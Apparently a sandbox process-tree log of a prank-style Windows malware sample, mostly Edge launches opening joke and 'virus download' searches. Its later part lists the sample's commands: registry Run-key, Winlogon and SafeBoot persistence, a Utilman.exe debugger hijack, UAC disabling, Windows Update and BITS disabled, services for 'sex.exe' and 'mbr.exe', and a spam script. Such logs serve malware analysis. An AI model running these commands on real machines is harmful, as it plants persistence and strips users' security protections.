C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6260,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6232 /prefetch:16⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=4412,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=3772 /prefetch:16⤵PID:3288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=5960,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6452 /prefetch:16⤵PID:2192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6540,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6320 /prefetch:16⤵PID:3240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=4572,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6600 /prefetch:16⤵PID:1836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=5876,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:16⤵PID:356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6784,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6772 /prefetch:16⤵PID:760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5952,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=5944 /prefetch:16⤵PID:5204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6684,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6696 /prefetch:16⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7016,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6772 /prefetch:86⤵PID:652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6652,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6292 /prefetch:86⤵PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7020,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6864 /prefetch:86⤵PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=4008,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:16⤵PID:5356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6824,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6216 /prefetch:16⤵PID:5312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=6760,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=6912 /prefetch:16⤵PID:2484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=5616,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:16⤵PID:2904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=2016,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=5564 /prefetch:16⤵PID:5844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=6624,i,15561243463182966543,12901694128324864492,262144 --variations-seed-version --mojo-platform-channel-handle=7412 /prefetch:16⤵PID:1696
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=youtube+killscreen3⤵PID:3180
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:2460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=dank+ajae3⤵PID:548
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:5176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=mydoom+virus+free+download+no+virus3⤵PID:2656
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:2556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=my+computer+is+doing+weird+things+wtf+is+happening+plz+halp3⤵PID:4452
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:3180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=fuck+you3⤵PID:5028
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:2896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=bfdi+hax+download3⤵PID:4796
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:5936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://softendo.com/3⤵PID:5384
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=new+super+mario+bros+forever+2012+download+no+virus3⤵PID:3952
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:1028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=bored+smashing3⤵PID:5284
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:1272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=batch+virus+download3⤵PID:1576
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youareanidiot.cc/3⤵PID:764
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:5476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/search?q=i+crave+beans3⤵PID:5828
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:5724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.nl/search?q=smoll+pp3⤵PID:5812
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=strawberry+benis3⤵PID:5780
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=cats+with+no+braincells3⤵PID:4872
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=cats+kissing+gif3⤵PID:548
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:2544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=theshellshield3⤵PID:3388
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=stinky+bitch3⤵PID:4980
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:2412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=guys+im+drunk3⤵PID:3044
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=coiny+dont+stop3⤵PID:4372
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:4580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=h3lp+m33⤵PID:1028
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.ca/search?q=nitro+generator+WITH+virus3⤵PID:5568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K cds.bat3⤵PID:2192
-
C:\Windows\system32\mode.commode 804⤵PID:5416
-
-
C:\Windows\system32\mode.commode 704⤵PID:1248
-
-
C:\Windows\system32\mode.commode 504⤵PID:2220
-
-
C:\Windows\system32\mode.commode 404⤵PID:1180
-
-
C:\Windows\system32\mode.commode 304⤵PID:4348
-
-
C:\Windows\system32\mode.commode 804⤵PID:4060
-
-
C:\Windows\system32\mode.commode 704⤵PID:2588
-
-
C:\Windows\system32\mode.commode 504⤵PID:3492
-
-
C:\Windows\system32\mode.commode 404⤵PID:1856
-
-
C:\Windows\system32\mode.commode 304⤵PID:6136
-
-
C:\Windows\system32\mode.commode 804⤵PID:2516
-
-
C:\Windows\system32\mode.commode 704⤵PID:6108
-
-
C:\Windows\system32\mode.commode 504⤵PID:4520
-
-
C:\Windows\system32\mode.commode 404⤵PID:4872
-
-
C:\Windows\system32\mode.commode 304⤵PID:4760
-
-
C:\Windows\system32\mode.commode 804⤵PID:2072
-
-
C:\Windows\system32\mode.commode 704⤵PID:5612
-
-
C:\Windows\system32\mode.commode 504⤵PID:4208
-
-
C:\Windows\system32\mode.commode 404⤵PID:3328
-
-
C:\Windows\system32\mode.commode 304⤵PID:5560
-
-
C:\Windows\system32\mode.commode 804⤵PID:464
-
-
C:\Windows\system32\mode.commode 704⤵PID:2380
-
-
C:\Windows\system32\mode.commode 504⤵PID:3824
-
-
C:\Windows\system32\mode.commode 404⤵PID:5416
-
-
C:\Windows\system32\mode.commode 304⤵PID:4768
-
-
C:\Windows\system32\mode.commode 804⤵PID:5408
-
-
C:\Windows\system32\mode.commode 704⤵PID:5024
-
-
C:\Windows\system32\mode.commode 504⤵PID:2040
-
-
C:\Windows\system32\mode.commode 404⤵PID:1576
-
-
C:\Windows\system32\mode.commode 304⤵PID:6108
-
-
C:\Windows\system32\mode.commode 804⤵PID:1924
-
-
C:\Windows\system32\mode.commode 704⤵PID:3712
-
-
C:\Windows\system32\mode.commode 504⤵PID:5992
-
-
C:\Windows\system32\mode.commode 404⤵PID:2732
-
-
C:\Windows\system32\mode.commode 304⤵PID:5076
-
-
C:\Windows\system32\mode.commode 804⤵PID:4520
-
-
C:\Windows\system32\mode.commode 704⤵PID:4988
-
-
C:\Windows\system32\mode.commode 504⤵PID:3592
-
-
C:\Windows\system32\mode.commode 404⤵PID:5000
-
-
C:\Windows\system32\mode.commode 304⤵PID:1656
-
-
C:\Windows\system32\mode.commode 804⤵PID:5012
-
-
C:\Windows\system32\mode.commode 704⤵PID:1480
-
-
C:\Windows\system32\mode.commode 504⤵PID:4872
-
-
C:\Windows\system32\mode.commode 404⤵PID:6024
-
-
C:\Windows\system32\mode.commode 304⤵PID:3716
-
-
C:\Windows\system32\mode.commode 804⤵PID:4928
-
-
C:\Windows\system32\mode.commode 704⤵PID:3628
-
-
C:\Windows\system32\mode.commode 504⤵PID:5976
-
-
C:\Windows\system32\mode.commode 404⤵PID:4452
-
-
C:\Windows\system32\mode.commode 304⤵PID:4392
-
-
C:\Windows\system32\mode.commode 804⤵PID:4760
-
-
C:\Windows\system32\mode.commode 704⤵PID:3400
-
-
C:\Windows\system32\mode.commode 504⤵PID:2488
-
-
C:\Windows\system32\mode.commode 404⤵PID:5344
-
-
C:\Windows\system32\mode.commode 304⤵PID:5112
-
-
C:\Windows\system32\mode.commode 804⤵PID:4060
-
-
C:\Windows\system32\mode.commode 704⤵PID:5620
-
-
C:\Windows\system32\mode.commode 504⤵PID:5168
-
-
C:\Windows\system32\mode.commode 404⤵PID:4616
-
-
C:\Windows\system32\mode.commode 304⤵PID:3616
-
-
C:\Windows\system32\mode.commode 804⤵PID:5568
-
-
C:\Windows\system32\mode.commode 704⤵PID:3328
-
-
C:\Windows\system32\mode.commode 504⤵PID:5560
-
-
C:\Windows\system32\mode.commode 404⤵PID:464
-
-
C:\Windows\system32\mode.commode 304⤵PID:2380
-
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\ColorFiltering" /v "Active" /t REG_DWORD /d 1 /f3⤵PID:6140
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v "Configuration" /t REG_SZ /d "colorfiltering" /f3⤵PID:2820
-
-
C:\Windows\system32\sc.exesc.exe create "Swift Hack Protection" binpath= "C:\Windows\System32\sex.exe"3⤵
- Launches sc.exe
PID:4208
-
-
C:\Windows\system32\sc.exesc.exe create "Hack Protection Swift" binpath= "C:\Windows\System32\mbr.exe"3⤵
- Launches sc.exe
PID:2808
-
-
C:\Windows\system32\sc.exesc config "Hack Protection Swift" start= auto3⤵
- Launches sc.exe
PID:5660
-
-
C:\Windows\system32\sc.exesc config "Swift Hack Protection" start= auto3⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:5908
-
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1288
-
-
C:\Windows\system32\sc.exesc config "wuauserv" start= disabled3⤵
- Launches sc.exe
PID:5408
-
-
C:\Windows\system32\sc.exesc config "bits" start= disabled3⤵
- Launches sc.exe
PID:6108
-
-
C:\Windows\system32\cscript.execscript email_spam.vbs3⤵PID:1480
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\ColorFiltering" /v "FilterType" /t REG_DWORD /d 1 /f3⤵PID:4744
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /f /d "explorer.exe, C:\Windows\System32\sex.exe"3⤵
- Modifies WinLogon for persistence
PID:4760
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "sex.exe" /d "C:\Windows\System32\sex.exe"3⤵
- Adds Run key to start application
PID:4392
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "sex.exe" /d "C:\Windows\System32\sex.exe"3⤵
- Adds Run key to start application
- Modifies registry key
PID:1200
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "mbr.exe" /d "C:\Windows\N3OS3X3R\mbr.exe"3⤵
- Adds Run key to start application
PID:4452
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "player.vbs" /d "player.vbs"3⤵
- Adds Run key to start application
PID:2488
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:2164
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:3020
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\SafeBoot /v AlternateShell /t REG_SZ /d "C:\Windows\System32\sex.exe" /f3⤵
- Modifies registry key
PID:1588
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName /v "ComputerName" /t REG_SZ /d "Neo" /f3⤵
- Modifies registry key
PID:4064
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s1159" /t REG_SZ /d "Neo" /f3⤵PID:2256
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s2359" /t REG_SZ /d "Neo" /f3⤵PID:4072
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sCountry" /t REG_SZ /d "Country of Sex" /f3⤵PID:5568
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sCurrency" /t REG_SZ /d "Neo" /f3⤵PID:272
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sNativeDigits" /t REG_SZ /d "Neo" /f3⤵PID:1488
-
-
C:\Windows\system32\reg.exereg add "HKCU\Console" /v "CursorSize" /t REG_DWORD /d "199" /f3⤵PID:5416
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\ColorFiltering" /v "FilterType" /t REG_DWORD /d 0 /f3⤵PID:2284
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Policies\CredentialUI" /v "DisablePasswordReveal" /t REG_DWORD /f /d 13⤵PID:5852
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v BatteryFlyout /t REG_DWORD /f /d 03⤵PID:4024
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v HelpCustomized /t REG_DWORD /f /d 13⤵PID:1868
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Manufacturer /t REG_SZ /f /d "Neo"3⤵PID:2732
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Model /t REG_SZ /f /d "Neo"3⤵PID:3592
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportHours /t REG_SZ /f /d "Neo"3⤵PID:4756
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportPhone /t REG_SZ /f /d "Neo"3⤵PID:5012
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportURL /t REG_SZ /f /d "http://www.neocorporations.com"3⤵PID:3716
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\MTCUVC" /v EnableMtcUvc /t REG_DWORD /f /d 03⤵PID:4468
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /f /d 03⤵PID:1200
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayNetworkSelectionUI /t REG_DWORD /f /d 13⤵PID:2956
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\System32\sex.exe" /f3⤵PID:4348
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo.vbs"3⤵PID:2300
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo2.vbs"3⤵PID:3444
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo3.vbs"3⤵PID:5624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo4.vbs"3⤵PID:1788
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo5.vbs"3⤵PID:1488
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4576
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4fc 0x4f81⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:4560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4780
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:1240
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:5880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:836
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:4008
-
